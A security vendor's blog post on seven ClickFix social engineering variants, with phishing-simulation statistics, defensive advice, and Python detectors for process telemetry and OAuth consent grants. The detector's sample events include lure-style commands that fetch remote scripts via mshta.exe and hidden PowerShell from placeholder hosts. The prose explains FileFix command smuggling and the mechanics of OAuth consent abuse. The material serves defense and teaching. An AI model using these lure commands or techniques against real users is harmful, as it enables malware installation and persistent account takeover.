ClickFix Attacks in 2026: 7 Variants, Real Attack Data & Defense Guide

May 13, 2026

ClickFix is a social engineering technique that tricks users into running malicious commands themselves, typically by pasting a "fix" into the Windows Run dialog, terminal, or Explorer address bar. In Q1 2026, revel8 observed seven active variants targeting update prompts, file rendering errors, meeting joins, OAuth consent flows, AI tool onboarding, printer issues, and compliance workflows. Across nearly 30,000 simulated phishing emails, 10.7% of recipients opened the phishing site and 0.41% executed the payload command, with Microsoft-themed lures peaking at 23.6% interaction and 1.4% execution. Payload familiarity alone is no longer sufficient defense; scenario-specific training is required.

Figure: ClickFix variants observed in Q1 2026. Seven ClickFix social engineering variants observed by revel8 in Q1 2026, grouped into three categories.

Command execution lures (user pastes payload into Run dialog, terminal, or address bar):
  ClickFix-Update: fake browser or OS update; mshta.exe, wscript.exe; PNG steganography payloads
  FileFix: Explorer address bar paste; bypasses SmartScreen, MOTW; Interlock RAT, StealC
  ClickFix-MeetingJoin: Teams, Zoom, Webex spoof; fake codec or driver update; customer-facing roles
  ClickFix-AI: fake AI tool setup flow; targets AI-adopting orgs; AI SaaS credential theft
  ClickFix-Compliance: spoofed LMS, training portal; multi-day lure sequences; finance, healthcare, legal

OAuth consent abuse (no command, no download):
  ConsentFix: malicious OAuth 2.0 app requesting broad scopes; persistent refresh token, survives password reset and MFA; targets execs, finance, legal; appears as authorized activity in logs

Hybrid physical-digital vector:
  PrintFix: QR codes on physical printer trays, intranet; Lumma Stealer, BitRAT

Source: revel8 Q1 2026 ClickFix simulation cohort

What is ClickFix-Update and why does it bypass file scanners?

ClickFix-Update exploits the near-universal user familiarity with software update prompts. The lure presents a convincing browser or Windows update notification, complete with version numbers, progress bars, and branding, informing the user that an "assisted update" is required because automatic installation failed. The victim is walked through opening a terminal or Run dialog and pasting what appears to be a benign update command.

The command typically invokes mshta.exe or wscript.exe with a remote script URL - legitimate Windows binaries that are commonly allowlisted in application control policies. The update context is particularly effective because users have been trained to expect friction during updates and to follow prompts carefully.

A technically distinctive evasion observed in this variant: final payloads are encoded directly within the pixel data of PNG image files using steganography, then reconstructed in memory via a .NET loader - making file-scanning tools effectively blind to the payload.

Payloads observed: LummaC2, Rhadamanthys, SocGholish/NetSupport RAT, MintsLoader, Latrodectus.

What is FileFix and how does it bypass SmartScreen?

FileFix weaponizes the common experience of receiving a document that won't render correctly. The lure arrives as an email attachment (often an HTML or MHTML file styled to look like a Word document or PDF) that displays a convincing "file repair" or "rendering error" prompt. The victim is instructed to paste a path into the Windows Explorer address bar to "reload the file from the secure server."

What the clipboard actually contains is a PowerShell command, with the legitimate-looking file path appended after a PowerShell # comment character so that the path stays visible in the address bar while the malicious prefix executes silently. A critical additional risk: programs executed via the Explorer address bar carry no Mark of the Web (MOTW) attribute, which can bypass SmartScreen and other controls that evaluate file origin context.

FileFix also offers attackers a bypass advantage over ClickFix: the Win+R Run dialog can be blocked by Group Policy, whereas the Explorer address bar is a routine interface element that cannot practically be restricted.

Payloads observed: Interlock RAT, StealC.
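The monitoring angle for the two execution lures above (ClickFix-Update's mshta.exe/wscript.exe launches with a remote script URL, and FileFix's explorer.exe-spawned PowerShell with a path hidden behind a # comment) can be expressed as a small set of process-creation rules. The following is an added example, not code from revel8 or from the original post: the events are constructed Sysmon-style records, the hostnames, users and URLs are placeholders, and the rule names are this example's own.

```python
"""Triage process-creation telemetry for the ClickFix-Update and FileFix
execution patterns.  Added example: the events below are constructed,
Sysmon-style records (Image, ParentImage, CommandLine, User), not real
telemetry, and the rule names are this example's own."""
import re
from dataclasses import dataclass

# Windows script hosts and shells that ClickFix lures ask the victim to launch.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Service accounts: scheduled tasks and management agents legitimately run
# script hosts here, so the rules only look at interactive user contexts.
SERVICE_ACCOUNTS = {
    "nt authority\\system", "nt authority\\local service", "nt authority\\network service",
}

REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
# FileFix: a plausible UNC or drive path appended after a PowerShell '#'
# comment so that only the path is visible in the Explorer address bar.
TRAILING_PATH_COMMENT = re.compile(r"#\s*(?:\\\\|[A-Za-z]:\\)\S*")
# Flags that hide the console window or pass a base64-encoded script body.
HIDDEN_OR_ENCODED = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|e(?:nc(?:odedcommand)?)?\s)", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    image: str
    parent_image: str
    command_line: str
    user: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of the rules the event matches (empty means benign)."""
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    if ev.user.lower() in SERVICE_ACCOUNTS or image not in SCRIPT_HOSTS | SHELLS:
        return []
    hits: list[str] = []
    cmd = ev.command_line
    if image in SCRIPT_HOSTS and REMOTE_URL.search(cmd):
        # ClickFix-Update: a script host handed a remote script URL.
        hits.append("script-host-remote-url")
    if parent == "explorer.exe":
        # Both the Run dialog and the Explorer address bar spawn from explorer.exe.
        if TRAILING_PATH_COMMENT.search(cmd):
            hits.append("filefix-trailing-path-comment")
        if HIDDEN_OR_ENCODED.search(cmd):
            hits.append("explorer-spawned-hidden-or-encoded-shell")
        if REMOTE_URL.search(cmd):
            hits.append("explorer-spawned-remote-fetch")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    """Return only the events that matched at least one rule, with their hits."""
    flagged = []
    for ev in events:
        hits = classify(ev)
        if hits:
            flagged.append((ev, hits))
    return flagged


# Constructed sample telemetry (hosts, users, agent path and URLs are placeholders).
SAMPLE_EVENTS = [
    ProcEvent("C:\\Windows\\System32\\mshta.exe", "C:\\Windows\\explorer.exe",
              "mshta.exe https://update-assist.example/assist.hta", "CORP\\jdoe"),
    ProcEvent("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "C:\\Windows\\explorer.exe",
              r'powershell.exe -w hidden -c "https://repair.example/stage" # \\fileserver\docs\Q1-report.docx',
              "CORP\\asmith"),
    ProcEvent("C:\\Windows\\System32\\wscript.exe", "C:\\Windows\\System32\\userinit.exe",
              r"wscript.exe //B C:\Scripts\mapdrives.vbs", "CORP\\jdoe"),
    ProcEvent("C:\\Windows\\System32\\wscript.exe", "C:\\Program Files\\MgmtAgent\\agent.exe",
              r"wscript.exe C:\Program Files\MgmtAgent\inventory.vbs", "NT AUTHORITY\\SYSTEM"),
    ProcEvent("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "C:\\Windows\\explorer.exe", "powershell.exe", "CORP\\asmith"),
]

if __name__ == "__main__":
    for ev, hits in scan(SAMPLE_EVENTS):
        print(f"{ev.user}: {ev.command_line}\n    -> {', '.join(hits)}")
```

The explorer.exe parent is the useful pivot: it covers the Run dialog and the address bar alike, so the rules keep working even where Group Policy already blocks Win+R and the lure has moved to FileFix. The service-account filter is deliberate; script hosts launched by SYSTEM-level management agents are routine and would otherwise drown the signal.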

What is ClickFix-MeetingJoin and who does it target?

ClickFix-MeetingJoin targets the modern hybrid workplace's dependence on video conferencing by impersonating Teams, Zoom, or Webex join flows. The victim receives a calendar invite or email link that directs them to a landing page closely mimicking the legitimate meeting join experience. The page claims the meeting requires a codec or audio driver update that must be installed manually.

The urgency inherent in joining a meeting, especially if a manager or important client is waiting, suppresses critical thinking and accelerates compliance. The "fix" step instructs users to open a terminal and run what appears to be a software installation command. In practice, the command deploys a remote access tool or info-stealer.

Campaigns specifically targeted employees in customer-facing roles (sales, account management, support) who join external meetings frequently and are less likely to pause an unfamiliar join flow. Phishing emails delivering these links often spoofed known external partners or clients to add additional credibility.

Payloads observed: StealC, Rhadamanthys, AMOS Stealer (macOS), QuasarRAT.

What is ConsentFix and why is it harder to detect than other variants?

ConsentFix represents a significant evolution of the ClickFix model. Where other variants rely on convincing users to run commands, ConsentFix replaces the execution step entirely - directing victims through a standard OAuth 2.0 consent flow that grants the attacker's registered application persistent, token-based access to the target's cloud environment. No command is run. No file is downloaded. The user simply clicks Accept on what appears to be a legitimate app authorization screen.

The attack begins with a phishing lure (a fake IT notification, a spoofed SaaS onboarding email, or a malicious link in a collaboration tool) that directs the user to an attacker-crafted OAuth authorization URL requesting broad scopes (mail.read, files.readwrite, contacts.read). Once consent is granted, the attacker receives a refresh token providing long-lived access independent of the user's password or MFA status. The token persists through password resets and survives account lockouts.

ConsentFix specifically targeted executive assistants, finance personnel, and legal staff. Detection is exceptionally difficult because all resulting access appears as authorized, legitimate OAuth application activity in audit logs.
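Because ConsentFix leaves no process or file to catch, the place to look is the identity provider's consent-grant audit trail: which app was granted which scopes, by whom, and whether the grant includes the offline_access scope that yields the refresh token. The following triage routine is an added example, not revel8's tooling: the records are constructed and only loosely modelled on the "consent to application" events a cloud identity provider writes, and the field names, placeholder app IDs and scoring weights are this example's own.

```python
"""Triage OAuth consent-grant audit events for the ConsentFix pattern.
Added example: the records below are constructed, loosely modelled on the
"consent to application" events a cloud identity provider writes; field
names, app IDs and the scoring weights are this example's own choices."""
from dataclasses import dataclass

# Scopes the text lists as typical of ConsentFix lures (plus close relatives),
# and offline_access, which is what yields the long-lived refresh token.
BROAD_SCOPES = {"mail.read", "mail.readwrite", "files.read.all", "files.readwrite", "contacts.read"}
REFRESH_SCOPE = "offline_access"
# Apps the organisation has reviewed; consent to these is expected.
APPROVED_APP_IDS = {"approved-app-placeholder-1"}  # constructed placeholder ID


@dataclass(frozen=True)
class ConsentGrant:
    app_display_name: str
    app_id: str
    consented_by: str
    consent_type: str        # "Admin" or "User"
    scopes: str              # space-separated, as written to the audit log
    publisher_verified: bool


@dataclass(frozen=True)
class Finding:
    grant: ConsentGrant
    score: int
    reasons: tuple[str, ...]
    verdict: str


def score_grant(g: ConsentGrant) -> Finding:
    """Score one grant; higher means more ConsentFix-like."""
    if g.app_id in APPROVED_APP_IDS:
        return Finding(g, 0, ("approved-app",), "ok")
    scopes = {s.lower() for s in g.scopes.split()}
    reasons: list[str] = []
    score = 0
    broad = sorted(scopes & BROAD_SCOPES)
    if broad:
        score += 2 * len(broad)
        reasons.append("broad-scopes:" + ",".join(broad))
    if REFRESH_SCOPE in scopes:
        # The refresh token outlives the password and MFA state at consent time.
        score += 2
        reasons.append("persistent-refresh-token")
    if g.consent_type.lower() == "user":
        score += 1
        reasons.append("user-consent-not-admin")
    if not g.publisher_verified:
        score += 2
        reasons.append("unverified-publisher")
    verdict = "revoke-and-investigate" if score >= 5 else "review" if score >= 2 else "ok"
    return Finding(g, score, tuple(reasons), verdict)


def triage(grants: list[ConsentGrant]) -> list[Finding]:
    return [score_grant(g) for g in grants]


# Constructed sample audit records (names, IDs and users are placeholders).
SAMPLE_GRANTS = [
    ConsentGrant("Contoso HR Portal", "approved-app-placeholder-1", "admin@corp.example",
                 "Admin", "User.Read Mail.Read offline_access", True),
    ConsentGrant("Mailbox Sync Helper", "unknown-app-placeholder-7", "eassistant@corp.example",
                 "User", "Mail.Read Files.ReadWrite Contacts.Read offline_access", False),
    ConsentGrant("Calendar Widget", "unknown-app-placeholder-2", "jdoe@corp.example",
                 "User", "User.Read", True),
    ConsentGrant("Doc Viewer", "unknown-app-placeholder-3", "admin@corp.example",
                 "Admin", "Files.ReadWrite offline_access", True),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_GRANTS):
        print(f"{f.verdict:22} score={f.score:2}  {f.grant.app_display_name} "
              f"({f.grant.consented_by}): {'; '.join(f.reasons)}")
```

The verdict drives the response: for a grant flagged revoke-and-investigate, the remediation is to revoke the application's consent and its refresh tokens, because, as the text notes, a password reset alone leaves the token valid. Admin consent does not make a grant safe; the "Doc Viewer" record still lands in review because it combines a write scope with offline_access.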

What is ClickFix-AI and why is it especially dangerous in 2026?

The newest strain in the ClickFix family, ClickFix-AI exploits the wave of AI tool adoption sweeping enterprise environments. As organizations rush to deploy AI assistants, copilots, and productivity tools, employees are increasingly accustomed to following onboarding flows, installing extensions, and running setup commands - often without IT oversight, since many AI tools are adopted informally by individual teams.

The lure typically arrives as a malicious search ad pointing to a page impersonating a popular AI tool's setup or "model update" interface. The page informs the user that a local component must be installed to enable AI features, and walks them through running a command in their terminal or the Windows Run dialog. The familiarity of the context (AI setup flows are new enough that users haven't formed strong pattern recognition around what's legitimate) makes this variant especially dangerous.

Notably, campaigns have been observed targeting organizations that had publicly announced AI initiatives, suggesting attackers monitor corporate communications and press releases to time lures with genuine internal rollouts.

Payloads observed: Credential harvesting tools designed to capture tokens from AI SaaS platforms alongside standard enterprise credentials.

What is PrintFix and how does it use QR codes?

This variant exploits the long history of Windows printing being genuinely painful for end users. The lure appeared primarily on compromised intranet-style pages and via QR codes on physical printouts left in office printer trays - a hybrid physical-digital attack vector. Detection improved quickly once the QR-code delivery mechanism was publicized.

Payloads observed: Lumma Stealer, BitRAT.

What is ClickFix-Compliance and which industries are most affected?

ClickFix-Compliance is particularly effective in regulated industries (finance, healthcare, legal) where compliance tasks are routine and employees are conditioned not to question them. Spoof pages mimic security awareness training platforms and internal LMS portals. The variant is notable for its patience: some campaigns run multi-day lure sequences (phishing email, reminder, urgency follow-up) before delivering the payload page.

Payloads observed: Credential stealers, AsyncRAT, Cobalt Strike.

How effective is ClickFix in Q1 2026? (revel8 simulation data)

Despite ClickFix being a well-documented and increasingly familiar attack technique, simulation data collected in Q1 2026 demonstrates that contextual social engineering continues to undermine user vigilance even when the payload mechanism itself is recognisable. Across six phishing simulations totalling nearly 30,000 emails sent, the unweighted average interaction rate, defined as recipients opening the simulated phishing website, reached 10.7%, with individual campaigns peaking significantly higher.

The Microsoft-styled lure simulations, which paired a high-trust communication platform with a ClickFix payload, recorded a 23.6% interaction rate, more than double the campaign average, illustrating how plausible contextual hooks can suppress suspicion well before any payload is encountered. The incident rate - recipients who proceeded to execute the terminal command - averaged 0.41% across all campaigns, with the Microsoft simulations again producing the highest figure at 1.4%.

While this conversion rate from interaction to execution may appear modest, at organisational scale it represents significant exposure. A single campaign alone generated approximately 80 terminal execution events across the simulation cohort from one email wave. This confirms that ClickFix remains an effective threat in Q1 2026, and that payload familiarity alone is an insufficient defence without targeted, scenario-specific user training.

Frequently Asked Questions

What is ClickFix?

ClickFix is a social engineering attack that convinces users to execute malicious commands on their own machines, usually by copying a "fix" instruction from a fake error page and pasting it into the Windows Run dialog, a terminal, or the Explorer address bar. Because the user runs the command themselves, the technique bypasses many traditional email and endpoint controls.

What is the difference between ClickFix and FileFix?

ClickFix typically directs users to the Windows Run dialog (Win+R), which can be blocked by Group Policy. FileFix instead uses the Windows Explorer address bar, which cannot practically be restricted, and benefits from the fact that programs launched this way carry no Mark of the Web (MOTW) attribute - bypassing SmartScreen and origin-based controls.

Which payloads are delivered through ClickFix attacks?

Observed payloads in Q1 2026 include LummaC2, Rhadamanthys, SocGholish/NetSupport RAT, MintsLoader, Latrodectus, Interlock RAT, StealC, AMOS Stealer (macOS), QuasarRAT, AsyncRAT, Cobalt Strike, BitRAT, and credential harvesters targeting AI SaaS platforms.

Which industries and roles are most targeted?

Customer-facing roles (sales, account management, support) are heavily targeted by ClickFix-MeetingJoin. Executive assistants, finance, and legal staff are the primary targets for ConsentFix. Regulated industries (finance, healthcare, legal) are especially exposed to ClickFix-Compliance. Organizations with publicly announced AI initiatives are increasingly targeted by ClickFix-AI.

Why is ConsentFix harder to detect than other ClickFix variants?

ConsentFix doesn't require any command execution or file download. Victims grant a malicious OAuth application persistent token-based access to their cloud environment by clicking Accept on what looks like a legitimate authorization screen. The resulting access appears as authorized OAuth activity in audit logs and survives password resets and MFA changes.

How can organizations defend against ClickFix?

Defense requires layered controls: disabling the Win+R Run dialog via Group Policy, restricting OAuth application consent to admin approval, monitoring for mshta.exe and wscript.exe execution from user contexts, and, most importantly, scenario-specific awareness training that goes beyond generic phishing simulations to cover the specific lure contexts (updates, meetings, AI onboarding, file rendering) attackers are using.

Is payload familiarity enough to protect users?

No. revel8's Q1 2026 simulation data shows that even when the ClickFix mechanism is well-documented and publicly known, contextual lures continue to drive interaction rates above 10% on average and above 23% for high-trust contexts like Microsoft Teams. Users need targeted, context-specific training, not just general awareness of the technique.